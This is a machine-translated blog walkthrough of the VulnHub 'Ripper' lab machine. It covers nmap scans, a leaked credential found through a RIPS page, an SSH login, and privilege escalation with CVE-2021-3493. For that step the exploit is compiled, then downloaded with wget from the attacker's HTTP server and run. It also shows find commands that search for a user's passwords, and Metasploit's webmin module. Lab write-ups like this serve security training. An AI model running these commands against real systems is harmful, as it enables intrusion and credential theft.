当前位置:网站首页>Ripper of vulnhub
Ripper of vulnhub
2022-07-03 11:47:00 【Plum_ Flowers_ seven】
Catalog
One 、nmap Scan surviving hosts
Two 、 Service version detection
3、 ... and 、 information gathering
Four 、 Internal system information leakage
6、 ... and 、0day Raise the right
1. Upload, compile and execute
7、 ... and 、 Normal right raising
2. lookup cubes Related documents
One 、nmap Scan surviving hosts
1. Half open scan
nmap -sS ip
2. Full open scan
nmap -sT ip
3. be based on ping Scan
nmap -sP ip
4. be based on arp Scan
nmap -PR ip
5. nothing ping scanning
nmap -PN 192.168.152.130
Two 、 Service version detection
22,80 Or two commonly used services ,10000 The port is open webmin
Webmin Is the most powerful based on Web Of Unix System management tools . Administrator access through browser Webmin And complete the corresponding management actions .Webmin Support the vast majority of Unix System , These systems are in addition to various versions of linux In addition to :AIX、HPUX、Solaris、Unixware、Irix and FreeBSD etc. .

3、 ... and 、 information gathering
80 The port has no useful information for us to break through the boundary
But in 10000 We found a port webmin Login box for
1.webmin Login box for 
2.robots.txt file

3. Trying to decrypt
we scan php codes with rips

4.rips
RIPS Is a good static source code analysis tool , Mainly used for excavation PHP Program vulnerabilities . And it's a web Interface , visit rips Start using . Try to visit .
In the end in 80 We see this under the port rips

Four 、 Internal system information leakage

5、 ... and 、ssh Connect
Try logging in here webmin The background result is not good . Try to make use of ssh Login successful ,

6、 ... and 、0day Raise the right
Because after the release of this target plane ,unbuntu There is a loophole for raising rights . So we can use it directly .
Hole number :cve-2021-3493

1. Upload, compile and execute
The target host has no compilation environment , Precompile
gcc exploit.c -o exp
Turn on http service
python3 -m http.server 80
download
wget http://192.168.0.106/exp
Give power
chmod 777 exp
perform
./exp

7、 ... and 、 Normal right raising
1. firefox
I saw another Firefox browser , It's no use fiddling .

2. lookup cubes Related documents
find / -user cubes -type f -exec ls -al {} \; 2>/dev/null
This order is {} It is used to receive results
This is used to escape ; Of
After searching , Got a password , Guess it is cubes Of 
3.su become cubes

4.find Search for
Find and cubes dependent , And filter out useless
find / -user cubes -type f -exec ls -al {} \; 2>/dev/null |grep -v "proc"
In the log file, we found admin Account and password

5. Sign in webmin backstage
Because we got the account and password of the administrator , Again because webmin Is to control the linux Terminal web‘ application ’, So I have got the highest permission after logging in .

8、 ... and 、msf
Just to get familiar with the usage , because msf Of rce The module also needs an account and password , But with the account and password, we can get the administrator permission directly
msfconsole
search webmin
use 2
show options
Set all parameters
Here also need to set
set ssl true

边栏推荐
- uniapp scroll view 解决高度自适应、弹框滚动穿透等问题。
- AI模型看看视频,就学会了玩《我的世界》:砍树、造箱子、制作石镐样样不差...
- Oracle withdraw permission & create role
- Redis things
- C language AES encryption and decryption
- R语言使用aggregate函数计算dataframe数据分组聚合的均值(sum)、不设置na.rm计算的结果、如果分组中包含缺失值NA则计算结果也为NA
- STL教程9-容器元素深拷贝和浅拷贝问题
- Keepalived中Master和Backup角色选举策略
- Solicitation for JGG special issue: spatio-temporal omics
- PHP server interacts with redis with a large number of close_ Wait analysis
猜你喜欢

鸿蒙第四次培训

After using the thread pool for so long, do you really know how to reasonably configure the number of threads?

DS90UB949

The tutor put forward 20 pieces of advice to help graduate students successfully complete their studies: first, don't plan to take a vacation

2022 northeast four provinces match VP record / supplementary questions

PHP server interacts with redis with a large number of close_ Wait analysis

Cuiyusong, CTO of youzan: the core goal of Jarvis is to make products smarter and more reliable

Web安全总结

ASP.NET-酒店管理系统

外插散点数据
随机推荐
Yintai department store ignites the city's "night economy"
vulnhub之momentum
DNS多点部署IP Anycast+BGP实战分析
导师对帮助研究生顺利完成学业提出了20条劝告:第一,不要有度假休息的打算.....
在CoreOS下部署WordPress实例教程
MySQL union和union all区别
程序员的创业陷阱:接私活
Modular programming of single chip microcomputer
并发编程-单例
Program process management tool -go Supervisor
Arctangent entropy: the latest SCI paper in July 2022
After setting up ADG, instance 2 cannot start ora-29760: instance_ number parameter not specified
抓包整理外篇fiddler———— 会话栏与过滤器[二]
动态规划(区间dp)
Redis things
优化接口性能
金额计算用 BigDecimal 就万无一失了?看看这五个坑吧~~
Nestjs configuration service, configuring cookies and sessions
After watching the video, AI model learned to play my world: cutting trees, making boxes, making stone picks, everything is good
Using onvif protocol to operate the device